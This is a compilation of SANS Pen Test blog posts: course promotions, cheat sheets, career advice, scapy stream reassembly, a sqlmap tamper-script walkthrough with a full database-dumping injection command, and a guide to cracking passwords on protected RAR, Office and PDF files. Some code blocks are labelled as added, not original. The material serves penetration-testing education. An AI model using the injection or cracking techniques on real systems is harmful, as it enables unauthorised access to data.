SANS Pen Test Challenge Coin: SEC460

 


With every SANS Pen Test Challenge Coin comes a story. In addition to symbolizing achievement and knowledge, a Pen Test Challenge Coin is a physical manifestation of the keyboard skills demonstrated by the winners of our course’s Capture-the-Flag exercise.

The front of the SEC460: Enterprise Threat and Vulnerability Assessment challenge coin carries the SEC460 logo and title. Great Vulnerability Assessors require an unwavering, burning passion to overcome the endless river of vulnerability data that major corporate networks are inundated with. The SEC460 logo represents this enthusiastic perseverance and attention to detail, the hallmarks of any excellent vulnerability team.

Hands-on labs and challenges are all conducted on a cyber range featuring the components of a large corporate environment. To represent this leap into the deep, dark, and unknown corners of large-scale network environments, the rear of the coin is adorned with an image of the HMS Enterprise – a vessel whose very name attests to daring military engagements.

The reverse side of the coin carries the SEC460 slogan: We cannot direct the wind, but we can adjust the sails. A defining and shared experience of all Vulnerability Assessors is the constantly shifting corporate environments we are charged to protect. While we may not be able to define the direction our organizations take, we are endowed with the opportunity to observe and think opportunistically in protecting them.
Like all other Pen Test coins before it, the SEC460: Enterprise Threat and Vulnerability Assessment challenge coin is its own challenge. The cipher itself connects to the nautical history of the image of the vessel above it. Who will be the first to crack it?


SEC460: Enterprise Threat and Vulnerability Assessment

How do you protect an organization with 1,000+ nodes from the crippling damage of widespread malware like WannaCry and NotPetya? Our brand-new 400-level course is designed to help you and your organization detect, prioritize, and mitigate enterprise-scale vulnerabilities.

Syllabus & Training Schedule: https://www.sans.org/course/enterprise-threat-vulnerability-assessment

Register for this brand-new course today!

 

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying-style video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions for free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen

SANS Cheat Sheet: Python 3

 

by: Mark Baggett

Python 2 – The end of the world as we know it.

It will happen. In the year 2020 an event will occur that will alter the course of information security forever. What is this apocalyptic event? The end of life for Python 2. Is it that big of a deal? Meh. I’m just being dramatic. As of 2020 they will stop releasing updates and patches to Python 2. But Python 2 isn’t going anywhere. If history has taught us lessons about what happens to unsupported software then we will continue to see it running critical infrastructure and hospital equipment for many years to come. Those programs that run in Python 2 interpreters today will continue to run in Python 2 interpreters well after 2020. Sadly today some organizations are still running old Python 2.5 interpreters despite the fact that it is now 13 years old and has serious security issues. It’s pretty safe to say that we will continue to see Python 2 for the foreseeable future.

That said, I think it is a little short-sighted to continue to develop new tools and automation in Python 2 today. Today you should definitely be developing new code that works in Python 3. Any new tools you purchase and plan to use for more than a year should run in Python 3. You should also weigh the risk of running an old Python 2 interpreter that may have security vulnerabilities once it is no longer supported against the cost of updating your code to work with a supported interpreter. As you look to the future, you should do so with Python 3 in your sights.

SANS SEC573: Automating Information Security with Python and the associated GPYC certification ride the Python 2/Python 3 fence along with the rest of the industry. The course teaches you to build new tools for automating common defensive, forensic, and offensive tasks in Python 3. Developing new tools in Python 3 will set you up for success moving forward. We also cover what you need to know to convert your existing Python 2 code to Python 3. If you need to continue to use Python 2, we will teach you how to write code that is forward compatible with Python 3 so you are ready to switch when you are eventually forced to. In my opinion it isn’t really a choice between Python 2 and Python 3. The answer is both. We will be supporting both versions for a while. In celebration of that fact, here are the SEC573 Python 2 and Python 3 cheat sheets, available for you to download and print! Enjoy!

 

DOWNLOAD – Python 2.7 Cheat Sheet


DOWNLOAD – Python 3 Cheat Sheet


 


SANS Cheat Sheet: Netcat

 

by SANS Pen Test Team

We are adding another SANS Cheat Sheet to our arsenal of information security/penetration testing cheat sheets available here at the SANS Pen Test Blog. If you would like additional cheat sheets, click on the “cheatsheet” category or see below to find them all.

This cheat sheet is from our SANS SEC560: Network Penetration Testing and Ethical Hacking course, authored by SANS Fellow, Ed Skoudis. To learn Netcat in-depth along with many other tools, methods, and techniques of penetration testing, please consider taking our core pen testing course, SEC560.

What is Netcat… from the wiki:

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection its user could need and has a number of built-in capabilities.

Download PDF: netcat-cheat-sheet


 

Other Netcat Resources:

Bash’s Built-in Netcat Client

Netcat without -e? No problem!

 


SANS Poster – White Board of Awesome Command Line Kung Fu (PDF Download)

 

by: SANS Pen Test Team

Imagine you are sitting at your desk and come across a great command line tip that will assist you in your career as an information security professional, so you jot the tip down on a note, post-it, or scrap sheet of paper and tape it to your white board… now imagine you do this all the time until your white board is completely full of useful tips you’ve found and can use daily.

That is the concept behind the SANS Pen Test Poster: White Board of Awesome Command Line Kung-Fu created by the SANS Pen Test Instructors. Each tip was submitted by the Pen Test Instructors and curated by SANS Fellow, Ed Skoudis.

We are giving you a complete white board full of tips you can use to become a better InfoSec professional.

Now it is available for you to download.

Download PDF – PENT-PSTR-WHITEBOARD-V3-0118_web.pdf


 

Additional Educational Posts based on the Poster:

Python:

“White Board” – Python – Python Debugger
“White Board” – Python – Python Reverse Shell!
“White Board” – Python – Pythonic Web Server
“White Board” – Python – Raw Shell -> Terminal
“White Board” – Python – Pythonic Web Client

Bash:

“White Board” – Bash – Useful IPv6 Pivot
“White Board” – Bash – Encrypted Exfil Channel!
“White Board” – Bash – What’s My Public IP Address?
“White Board” – Bash – Bash’s Built-In Netcat Client
“White Board” – Bash – Check Service Every Second
“White Board” – Bash – Make Output Easier to Read
“White Board” – Bash – Website Cloner
“White Board” – Bash – Sudo… Make Me a Sandwich
“White Board” – Bash – Find Juicy Stuff in File System

CMD.exe:

“White Board” – CMD.exe – C:\> netsh interface
“White Board” – CMD.exe – C:\> wmic process

PowerShell:

“White Board” – PowerShell – Add a Firewall Rule
“White Board” – PowerShell – Built-in Port Scanner!
“White Board” – PowerShell – Get Firewall Rules
“White Board” – PowerShell – One-Line Web Client
“White Board” – PowerShell – Ping Sweeper!
“White Board” – PowerShell – Find Juicy Stuff in the File System

 

Desktop Wallpapers based on Poster:

Bash, PowerShell, Python…


So You Wanna Be a Pen Tester? 3 Paths To Consider (Updated)

Tips for Entering the Penetration Testing Field

By Ed Skoudis

It’s an exciting time to be a professional penetration tester. As malicious computer attackers amp up the number and magnitude of their breaches, the information security industry needs an enormous amount of help in proactively finding and resolving vulnerabilities. Penetration testers who are able to identify flaws, understand them, and demonstrate their business impact through careful exploitation are an important piece of the defensive puzzle.

In the courses I teach on penetration testing, I’m frequently asked about how someone can land their first job in the field after they’ve acquired the appropriate technical skills and gained a good understanding of methodologies. Also, over the past decade, I’ve counseled a lot of my friends and acquaintances as they’ve moved into various penetration testing jobs. Although there are many different paths to pen test nirvana, let’s zoom into three of the most promising. It’s worth noting that these three paths aren’t mutually exclusive either. I know many people who started on the first path, jumped to the second mid-way, and later found themselves on path #3. Or, you can jumble them up in arbitrary order.

Path A: General Enterprise Security Practitioner Moving to Penetration Testing

First, you could parlay a job in the security group of an enterprise (whether a corporate, government, or educational position) into vulnerability assessment and then penetration testing. For example, today you may be a security auditor, administrator, analyst, or a member of a Security Operations Center (SOC) team. Tell your management that you are keenly interested in vulnerability assessment and penetration testing, and offer your support in existing projects associated with those tasks. You might have to start by taking one for the team and putting in your own hours to help out, without getting a break from your “regular” job. Consider this extra time an investment in yourself. At first, you could help with tasks such as project scoping, false positive reduction, and remediation verification. Later, offer help in preparing a high-quality penetration testing report. Over the space of several months or even a year, you’ll demonstrate increasing skills and can ask management or other groups in your enterprise for a move more directly into the heart of penetration testing work.

Path B: Working for a Company or Division that Focuses on Penetration Testing

There are many companies that provide third-party penetration testing services to other companies, including organizations such as Verizon, Trustwave, and FishNet Security. Many of these organizations are looking to hire exceptional penetration testers, especially those who have experience. If you have no direct penetration testing experience, you may still want to try your hand by applying for a junior role in such organizations. A solid background in secure networking, development, or operations will prove helpful. But, if experience is absolutely required, consider moving through Paths A or C to hone your skills before jumping to Path B.

Path C: Going Out on Your Own

If you are more entrepreneurially minded, you may want to consider forming your own small company on the side to do vulnerability assessment for local small businesses, such as a local florist or auto mechanic. Start with just vulnerability assessment services, and build your skills there before going into full-blown penetration testing. There are a couple of huge caveats to take into account with this path, though. First off, make sure you get a good draft contract and statement of work template drawn up by a lawyer to limit your liability. Next, get some liability and errors & omissions insurance for penetration testing. Such protection could cost a few thousand dollars annually, but is vital in doing this kind of work. Once you’ve built your vulnerability assessment capabilities, you may want to gradually start looking at carefully exploiting discovered flaws (when explicitly allowed in your Statements of Work) to move from vulnerability assessment to penetration testing. After your small business is humming, you may decide to stick with this path, growing your business, or jump into Paths A or B.

Regardless of whether you go down paths A, B, C, or your own unique approach to entering the penetration testing industry, always keep in mind that your reputation and trustworthiness are paramount in the information security field. Your name is your personal brand, so work hard, be honest, and always maintain your integrity. Additionally, build yourself a lab of four or five virtual machines so you can practice your technical skills regularly, running scanners, exploitation tools, and sniffers so you can understand your craft at a fine-grained level. Learn a scripting language such as Python or Ruby so you can start automating various aspects of your tasks and even extend the capabilities of tools such as the Metasploit framework. And, most of all, give back to the community by writing a blog, sharing your ideas and techniques, and releasing scripts and tools you’ve created. You see, to excel in pen testing, you can’t think of it as a job. It is a way of life. Building a sterling reputation and contributing to others is not only beneficial to the community, but it will provide many direct and indirect benefits to you as you move down your path from new penetration tester to seasoned professional.

Additional SANS Penetration Testing Resources

Watch: WEBCAST – So, You Wanna Be a Pen Tester?


Available Now!
Recorded: 6/19/2108
https://www.sans.org/webcasts/so-wanna-pen-tester-3-paths-106920

 

–Ed.

https://twitter.com/edskoudis


SANS Poster: Building a Better Pen Tester – PDF Download

 

Blog Post by: SANS Pen Test Team

 

It’s here! It’s here! The NEW SANS Penetration Testing Curriculum Poster has arrived (in PDF format)!

This blog post is for the downloadable PDF version of the new “Blueprint: Building a Better Pen Tester” Poster created by the SANS Pen Test Curriculum.

The front of the poster is full of useful information directly from the brains of SANS Pen Test Instructors. These are the pen testing tips they share with the students of SANS SEC560: Network Penetration Testing and Ethical Hacking and our other pen testing, ethical hacking, exploit dev, and vulnerability assessment courses.

The back of the poster has a checklist for scoping and rules of engagement, command line commands for Metasploit, Scapy, Nmap, and PowerShell, and information about Slingshot and the SANS Pen Test Curriculum.

Our hope is that the knowledge contained in this poster will help you become a better pen tester, and, if you aren’t currently a pen tester, that the information will help you become a more informed information security professional.

Training: Learn ethical hacking and penetration testing with one of our world-class instructors by taking SEC560: Network Penetration Testing and Ethical Hacking in person or online.

Download:

Download: PENT-PSTR-SANS18-BP-V1_web

 

SANS Webcast – Building A Better Pen Tester Poster


YouTube: https://youtu.be/feljUh5Q6V0

Desktop Wallpapers:

Click image for full-sized wallpaper file

  • Pre-Engagement & Reconnaissance (Blueprint_Wallpaper_Pre-Eng&Recon)
  • Vulnerability Analysis & Password Attacks (Blueprint_Wallpaper_VA&PA)
  • Exploitation & Post-Exploitation (Blueprint_Wallpaper_Exp&Post-Exp)
  • Rules of Engagement & Scoping Checklist (Blueprint_Wallpaper_RE&Scoping)


SCAPY Full Duplex Stream Reassembly

 

I recently had someone ask me how you can have scapy reassemble full duplex packets for you. That is what Wireshark does when you ask it to “Follow TCP Stream”. In SANS SEC573: Automating Information Security with Python we discuss how to use scapy’s native session reassembly capabilities, but its default behavior is to reassemble unidirectional streams. In other words, two separate sessions are created: one for traffic that flows from Host A to Host B and another for the traffic in the same session that flows from Host B to Host A. To use scapy’s native session reassembly you call a packet list’s .sessions() method, which returns a Python dictionary of followed streams. The keys of that dictionary are strings indicating who is communicating with whom, in the format "Protocol SourceIP:SourcePort > DestinationIP:DestinationPort". Each value in the dictionary is a list of all the packets that are part of that stream.

[Screenshot: sessions() output whose keys show two unidirectional streams for one conversation]

 

In this example you can tell by looking at the keys that there are two sessions. In the course we go into more detail about how to reassemble these packets to extract payloads so you can look for useful pieces of attack signatures. But, the question posed to me was “How can I do this with full duplex streams combining those two into a single session like Wireshark?” There are a couple of ways you could do this. One option is just to combine the two sets of packets.

[Screenshot: combining the two packet lists into one]

 

This works well for a few packets, but at scale it can be problematic. For example, if you step through a large file you have to keep track of which streams you already combined so that when you reach the second half of the conversation you don’t process the same stream a second time. A better option is to pass the scapy PacketList sessions() method a function that tells it how to reassemble the packets in full duplex. The function takes in a single packet and returns a string containing the bits of data that uniquely identify the stream. Every packet in your list of packets that yields the same string will automatically be grouped into a stream by the sessions() method. This behaves much like a key function for Python’s sort capability. For our streams to be full duplex we need the string to be identical for both Host A to Host B and Host B to Host A communications. You can accomplish this by sorting a list of the attributes that make our stream unique. Here is a function called full_duplex() that will reassemble all of the same protocols that the default session assembly process currently supports, but with bidirectional streams.

[Screenshot: the full_duplex() session key function]

 

To use the function pass the full_duplex function to the sessions() method and it will use it to reassemble your packets.

[Screenshot: calling sessions(full_duplex) on the packet list]

 

Here is an example of trying the full_duplex() function on a larger pcap file with multiple sessions.

[Screenshot: sessions() with and without full_duplex on a larger pcap]

 

You can see that without full_duplex you have 182 unidirectional streams and with full_duplex you have 91 bidirectional streams. Now, using various techniques, you can reassemble the payload from the full duplex streams and search for evil, forensic data, or other useful pieces of information. For more information on this and other techniques check out SANS SEC573: Automating Information Security with Python.
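The grouping described above, as an added example that is not the post’s own scapy_helper.py gist: full_duplex() builds a key with the two endpoints sorted so both directions of a conversation collapse into one stream, and sessions() stands in for scapy’s PacketList.sessions() so the logic runs without scapy or a pcap. The Flow dataclass and the SAMPLE packets are constructed for this example; on real scapy packets the same key function would read pkt[IP].src, pkt[TCP].sport and so on.

```python
# Added example (not the post's scapy_helper.py): a full-duplex session key
# and a stand-in for scapy's PacketList.sessions(), runnable without scapy.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """Minimal stand-in for the fields a scapy packet exposes
    (pkt[IP].src, pkt[TCP].sport, ...). Constructed for this example."""
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes = b""


def unidirectional_key(pkt):
    """Mirror scapy's default key: 'TCP 10.0.0.1:1234 > 10.0.0.2:80'.
    A->B and B->A get different keys, so one conversation becomes two streams."""
    return f"{pkt.proto} {pkt.src}:{pkt.sport} > {pkt.dst}:{pkt.dport}"


def full_duplex(pkt):
    """Bidirectional key: sort the two (ip, port) endpoints so both
    directions of a conversation produce the same string. Use port 0 for
    portless protocols so the tuples stay comparable."""
    ends = sorted([(pkt.src, pkt.sport), (pkt.dst, pkt.dport)])
    return f"{pkt.proto} " + " <-> ".join(f"{ip}:{port}" for ip, port in ends)


def sessions(pkts, session_extractor=unidirectional_key):
    """Stand-in for PacketList.sessions(session_extractor): group packets by
    the string the key function returns, preserving capture order."""
    streams = defaultdict(list)
    for pkt in pkts:
        streams[session_extractor(pkt)].append(pkt)
    return dict(streams)


def stream_payload(pkts):
    """Concatenate payloads in capture order: the 'Follow TCP Stream' view."""
    return b"".join(p.payload for p in pkts)


# Constructed sample capture: two TCP conversations and one DNS lookup,
# each with traffic in both directions (six packets, three conversations).
SAMPLE = [
    Flow("TCP", "10.0.0.5", 40000, "203.0.113.7", 80, b"GET / HTTP/1.1\r\n"),
    Flow("TCP", "203.0.113.7", 80, "10.0.0.5", 40000, b"HTTP/1.1 200 OK\r\n"),
    Flow("TCP", "10.0.0.5", 40001, "203.0.113.7", 443, b"\x16\x03\x01"),
    Flow("TCP", "203.0.113.7", 443, "10.0.0.5", 40001, b"\x16\x03\x03"),
    Flow("UDP", "10.0.0.5", 53001, "10.0.0.1", 53, b"query"),
    Flow("UDP", "10.0.0.1", 53, "10.0.0.5", 53001, b"answer"),
]


if __name__ == "__main__":
    uni = sessions(SAMPLE)
    bi = sessions(SAMPLE, full_duplex)
    print(f"{len(uni)} unidirectional streams, {len(bi)} bidirectional streams")
    for key, pkts in bi.items():
        print(key, stream_payload(pkts))
```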

The Scapy Packet reassembly:

https://gist.github.com/MarkBaggett/d8933453f431c111169158ce7f4e2222#file-scapy_helper-py

  • Mark Baggett

 


SQLMAP Tamper Scripts for The Win

 

During a recent penetration test BURP Suite identified some blind SQL Injection vulnerabilities in a target website. Pointing SQLMAP at the website showed us no love and simply said it was unable to exploit the website. I had mentioned the SQLi issues to the customer and he said that previous penetration testers said they were unexploitable. We decided to take a closer look anyway. The URLs for the website looked rather odd. I can’t talk specifically about the website in question, but the URIs looked something like this:

 

 

http://www.example.tgt/website.php?QnnyBZ4_ZB6qvm=xxxTcTc&k3mK4_ZQ6v=6V9A&UQK4_ZQ6v=qVllgrr

[Screenshot: the URL above with the field names underlined in red and the values underlined in blue]

 

You’ll notice that the field names (underlined in RED) have very strange names. At first I thought that these were just weird field names. Maybe the developer had some codenames for fields that I just didn’t understand. But then I noticed that the values (underlined in BLUE) were also very odd. None of the information on the URL made any sense to me. I grabbed a coworker and we spent some time trying to figure out what kind of weird encoding was being used. The web application had some useful functionality that made the translation pretty easy to figure out. If we put "AAAAAAAAA" into the ACCOUNT NUMBER field in the website’s search page we saw that it redirected us to a web page with a URI containing 'QnnyBZ4_ZB6qvm=QQQQQQQQQ'. When we searched for an ACCOUNT NUMBER of "BBBBBBBBB" it took us to a web page with a URI containing 'QnnyBZ4_ZB6qvm=qqqqqqqqq'. There was obviously some type of character substitution cipher being used on the URL. The maximum size for an account number was 9 characters, but with a few queries I could figure out the entire character set mapping. I searched for an ACCOUNT NUMBER of "ABCDEFGHI" and found a URI containing 'QnnyBZ4_ZB6qvm=QqnPvka03'. I searched for "JKLMNOPQR" and found a URI containing 'QnnyBZ4_ZB6qvm=wMU6Zybjm'. I repeated this process for every upper, lower and numeric character and soon I had the following mapping of characters.

Normal Letters = ‘ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789’

Encrypted Letters = ‘QqnPvka03wMU6ZybjmK4BRSEWdVishgClpI1AouFNOJ9zrtL2Yef7Tc8GxDHX5’

Python makes translating between two sets of characters easy. Using Python 3 we can do the following:

 

[Screenshot: Python 3 str.maketrans() and str.translate() encoding "HELLO" with the mapping above]

 

This translated the word "HELLO" into "0vUUy" using the character mapping specified (note that H maps to the digit zero in this table). The arguments for maketrans are the "FROM STRING" followed by the "TO STRING". Going in the other direction is simply a matter of reversing the parameters passed to str.maketrans(), passing (encrypted_letters, normal_letters).

 

[Screenshot: the same translation run in reverse to decode]

 

In Python 2 you have to import the string module because the maketrans function lives there, but otherwise the syntax is the same.

[Screenshot: the Python 2 version using string.maketrans()]

 

Now I can decode the URLs! So we tried it on the URL we saw earlier.

[Screenshot: decoding the field names and values of the URL seen earlier]

 

Awesome. Now that is something I can understand. Now that we could freely encode and decode our attacks we had a bit more success with manual exploitation. But I’m lazy! I want SQLMAP to automate my attacks for me! If I don’t tell SQLMAP how to encode its injections it will not work against the website. SQLMAP tamper scripts are designed to do exactly that. SQLMAP is distributed with a set of "TAMPER" scripts to perform tasks like adding a NULL byte to the end of injections or randomizing the case of the letters in your query. Creating a custom tamper script to do our character substitution is pretty simple. SQLMAP is using Python 2, so we will have to import the string module. Looking at one of the other tamper scripts and using it as an example, we quickly wrote the following:

 

[Screenshot: the custom tamper script]

We saved this new file as “custom_caesar.py” and placed it inside SQLMAP’s “tamper” directory. Then we pass the name of our script to the --tamper argument.

python sqlmap.py -u "https://www.example.tgt/webapp.php?QnnyBZ4_ZB6qvm=xxxTcTc&k3mK4_ZQ6v=6V9A&UQK4_ZQ6v=qVllgrr" --tamper=custom_caesar.py --dump

 

Then sit back and watch SQLMAP’s barrage of winning. A few lines of custom Python code took this vulnerability from “an unexploitable false positive” to a significant vulnerability that requires immediate attention. After using the tamper script we are able to access everything in the database with SQLMAP saving us hours of manual exploitation and encoding. And all it took was plugging 3 lines of custom Python code into an existing tamper script template.
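The encode/decode step and the tamper hook in one block, as an added example that is not the post’s own custom_caesar.py gist. It uses the two character strings from the post with Python 3’s str.maketrans(), adds a decode_url() helper (an addition, not from the post) that decodes every name and value in a query string, and shapes tamper() the way sqlmap calls it; the sqlmap-only header lines (the PRIORITY import and the dependencies() stub) are left out so the block runs stand-alone.

```python
# Added example (not the post's custom_caesar.py): the site's substitution
# cipher as maketrans tables, a query-string decoder, and a tamper() hook
# in the shape sqlmap expects. Only letters and digits are mapped; every
# other character (_ = & space ' ( ) ...) passes through untouched, which
# is what lets an encoded SQL payload keep its structure.
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# The two strings from the post, in the same order.
NORMAL_LETTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
ENCRYPTED_LETTERS = "QqnPvka03wMU6ZybjmK4BRSEWdVishgClpI1AouFNOJ9zrtL2Yef7Tc8GxDHX5"

# maketrans(FROM, TO): swapping the arguments gives the inverse table.
ENCODE_TABLE = str.maketrans(NORMAL_LETTERS, ENCRYPTED_LETTERS)
DECODE_TABLE = str.maketrans(ENCRYPTED_LETTERS, NORMAL_LETTERS)


def encode(text):
    """Plain text -> the site's encoding (what the search page does)."""
    return text.translate(ENCODE_TABLE)


def decode(text):
    """The site's encoding -> plain text."""
    return text.translate(DECODE_TABLE)


def decode_url(url):
    """Decode every parameter name and value in a URL's query string,
    leaving scheme, host and path alone (helper added for this example)."""
    parts = urlsplit(url)
    pairs = [(decode(k), decode(v))
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(pairs)))


def tamper(payload, **kwargs):
    """sqlmap tamper hook: sqlmap calls tamper(payload, **kwargs) for each
    injection payload and sends whatever comes back. In a real tamper
    script this sits below the PRIORITY import and dependencies() stub
    copied from sqlmap's template (omitted here so the block runs alone)."""
    return encode(payload) if payload else payload


# Constructed check against the URL quoted in the post.
SAMPLE_URL = ("http://www.example.tgt/website.php"
              "?QnnyBZ4_ZB6qvm=xxxTcTc&k3mK4_ZQ6v=6V9A&UQK4_ZQ6v=qVllgrr")

if __name__ == "__main__":
    print(encode("HELLO"))          # 0vUUy (H maps to the digit zero)
    print(decode_url(SAMPLE_URL))   # readable field names and values
    print(tamper("AND 1=1"))        # what sqlmap would send for this payload
```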

Python is awesome and having the ability to use it and customize tools to meet your demands is incredibly powerful. Come check out SEC573: Automating Information Security with Python.

The SQLMAP Tamper Script

https://gist.github.com/MarkBaggett/49aca627205aebaa2be1811511dbc422#file-custom_caesar-py

  • Mark Baggett

 


How to Guide: Cracking into Piles of Files

by: Matt Edmondson

(Editor’s Note: this blog was originally submitted for posting on March 25th, but wasn’t posted until October 4th. We hope you enjoy this content and that Matt Edmondson continues to give freely of his knowledge to the blog.)

Password cracking is one of my favorite parts of information security. Many of us have built computer systems designed specifically for this task. We use tools like John the Ripper for quickie password cracking efforts and Hashcat for larger tasks, but we usually sic these tools on cryptographic password hashes we obtain from hash dumps, database tables and tools such as Responder. One of the lessons we’ve learned from high profile breaches such as Sony is that it’s extremely common for users and organizations to also store passwords in document formats such as Microsoft Word and Excel.

In this post we’ll talk about why we use video cards instead of our CPUs to crack passwords and how we can use these same tools and techniques to help us get into password protected office documents and archive files that may contain a user’s complete list of passwords or other juicy information.

John the Ripper is often the first tool that information security practitioners play with. It’s free, easy to use and even tries to automatically detect what type of hashes you’re attempting to crack. John is available for Windows, Linux and OS X and is built into several Linux distributions like Kali. If you’ve never used John before and are using a Windows system, you can download it from http://www.openwall.com/john/ . I would recommend the “jumbo” Windows binaries. The jumbo version of John supports more cryptographic hash formats than the regular version of John does, as well as a few extra features. The Windows binaries require zero setup outside of just extracting the files to a directory.

There is a blog post at https://www.tunnelsup.com/getting-started-cracking-password-hashes/ which gives a very quick overview of using John and has links to some password hashes as well as wordlists for use in password cracking.

After you start cracking passwords, you’ll probably get a strong, strong desire to start cracking them faster. The most common solution to this is to use a system with one or more graphics cards (GPUs) and use the GPUs to crack passwords instead of the computer’s CPU. While the jumbo version of John does support GPUs, the most popular tool for GPU password cracking is Hashcat. It’s very well supported, constantly updated, free and can be downloaded from https://hashcat.net/hashcat/ . As long as your video card drivers are up to date, Hashcat should automatically detect your GPU and use it for cracking.

Underneath the surface, password cracking requires a lot of math. Graphics cards are able to perform math functions like these at extremely high rates of speed. Because of this, a tool which utilizes GPUs can crack passwords MUCH faster than a CPU can. How much faster? I made a password protected .RAR file for a quick comparison.

Utilizing John the Ripper and my CPU to crack the password, I was making 174 guesses per second. This may sound like a lot, but for password cracking this is as slow as molasses.

pwcrackingtalk_01

The laptop I’m typing this post on has an integrated graphics card. These types of cards are usually the least powerful type of GPU for these purposes. Even so, Hashcat was able to use the card to make 1,432 guesses per second or over eight times faster than the CPU.

pwcrackingtalk_02

With a powerful video card, the speed increase is usually extremely large. A GTX 1080 Ti video card (currently over $500 on Amazon) is able to make over 50,000 guesses a second which is almost 300 times faster than CPU alone.

pwcrackingtalk_03

Getting started using GPUs to crack passwords is easy, but not necessarily cheap. If you have a system with a powerful graphics card, you already have everything you need. If you have a desktop computer sitting around you can probably buy a graphics card to put in it, but you may have to upgrade the system’s power supply as well, since high end cards tend to be power hungry.

If you’re on a budget you can buy a midrange video card like a GTX 1060 and still get a lot of bang for your buck. If money is no object, you can chain together multiple video cards and crack even faster. The Hashcat forums at https://hashcat.net/forum/ are a great place to check for performance benchmarks and ask advice.

These are all great options, but we’re burying the lede here. If we point Hashcat at a RAR file to crack, it will look at us confused and politely let us know that it doesn’t see any hashes in the RAR file. There are isolated tools out there that will try to crack specific file types, but we didn’t build a GPU password cracking rig to not use its power to crack. So how do we get a hash from the RAR file? The answer is John the Ripper. Well, not John himself, but his friends.

In the latest version of John the Ripper there are approximately sixty add-on applications and Python scripts in the run directory designed for you to be able to point at a file for it to generate a hash.

pwcrackingtalk_04

I’ve tried a few different file formats over the years and have had relatively good luck. Here is a file from WinRAR:

pwcrackingtalk_05

From Excel 2013 (not that anyone stores their passwords in an office document):

pwcrackingtalk_06

And a PDF:

pwcrackingtalk_07

Once we have the hash we can then use Hashcat or any other tool we want to try to crack the password. If you’re curious what the hash for a specific type of file should look like, the Hashcat wiki has a great entry of example hashes at https://hashcat.net/wiki/doku.php?id=example_hashes.

pwcrackingtalk_08
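Two practical details trip people up at this step: the *2john helpers print the hash as "filename:hash" and Hashcat rejects that filename prefix, and the hash mode you need depends on fields inside the hash (the Office version, the PDF V and R values, RAR3 versus RAR5). The following is an added example, not code from the post, that cleans such lines and groups them by Hashcat mode; its sample lines are constructed with dummy hex in the shape rar2john, office2john.py and pdf2john.py print.

```python
# Added example (not from the post): turn the output of John's *2john helpers into hashcat
# input. The SAMPLE lines are constructed with dummy hex, in the 'filename:hash' shape that
# rar2john, office2john.py and pdf2john.py print.
OFFICE_MODES = {"2007": 9400, "2010": 9500, "2013": 9600}          # hashcat -m per Office version
PDF_MODES = {("1", "2"): 10400, ("2", "3"): 10500, ("4", "4"): 10500,  # keyed on the $pdf$ V*R fields
             ("5", "5"): 10600, ("5", "6"): 10700}


def hashcat_mode(h):
    """Hashcat -m value for a John-format hash string, or None when no mode applies."""
    if h.startswith("$office$*"):
        return OFFICE_MODES.get(h.split("*")[1])
    if h.startswith("$pdf$"):
        fields = h[len("$pdf$"):].split("*")
        return PDF_MODES.get(tuple(fields[:2]))
    if h.startswith("$RAR3$*0*"):      # header-encrypted archive (rar -hp): mode 12500
        return 12500
    if h.startswith("$rar5$"):
        return 13000
    return None                        # e.g. $RAR3$*1* (rar -p) needs a different mode


def split_john_line(line):
    """Separate 'filename:hash[:trailing fields]'. Hashcat rejects the filename prefix,
    and the filename itself may contain ':' (Windows drive letters), so split at ':$'."""
    line = line.strip()
    cut = line.find(":$")
    if cut < 0:
        return None, None
    name, rest = line[:cut], line[cut + 1:]
    return name, rest.split(":")[0]    # drop ':::::file' style bookkeeping some scripts append


def prepare(lines):
    """Group cleaned hashes by hashcat mode; each group is one 'hashcat -m <mode>' run."""
    groups = {}
    for line in lines:
        name, h = split_john_line(line)
        if h is None:
            continue
        groups.setdefault(hashcat_mode(h), []).append((name, h))
    return groups


SAMPLE = [  # constructed, not real hashes
    "passwords.xlsx:$office$*2013*100000*256*16*00112233445566778899aabbccddeeff*"
    "0123456789abcdef0123456789abcdef*0123456789abcdef0123456789abcdef:::::passwords.xlsx",
    r"C:\Users\me\notes.pdf:$pdf$5*6*256*-1028*1*16*00112233445566778899aabbccddeeff*127*aa*127*bb",
    "backup.rar:$RAR3$*0*0011223344556677*00112233445566778899aabbccddeeff",
    "old.rar:$RAR3$*1*0011223344556677*deadbeef*64*64*1*00ff*33:1::secret.txt",
    "not a hash line",
]

if __name__ == "__main__":
    for mode, items in prepare(SAMPLE).items():
        print(mode, [h for _, h in items])
```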

So while a lot of us have gone away from using John the Ripper in an effort to take advantage of the power of GPU password cracking, we can still use him when we’re trying to get into password protected files that we commonly encounter on engagements.

There is a lot of overlap between the different realms of information security and one of the things I love most about teaching the SEC504: Hacker Tools, Techniques, Exploits, and Incident Handling for SANS is getting a chance to look at techniques from both an offensive point of view as well as a defensive perspective. Utilizing a GPU to access password protected documents can provide the keys to the kingdom on a penetration test, or a vital piece of information while performing digital forensics work.

Matt Edmondson
SANS Instructor
Twitter: https://twitter.com/matt0177


Modern Web Application Penetration Testing Part 2, Hash Length Extension Attacks

By: Adrien de Beaupre

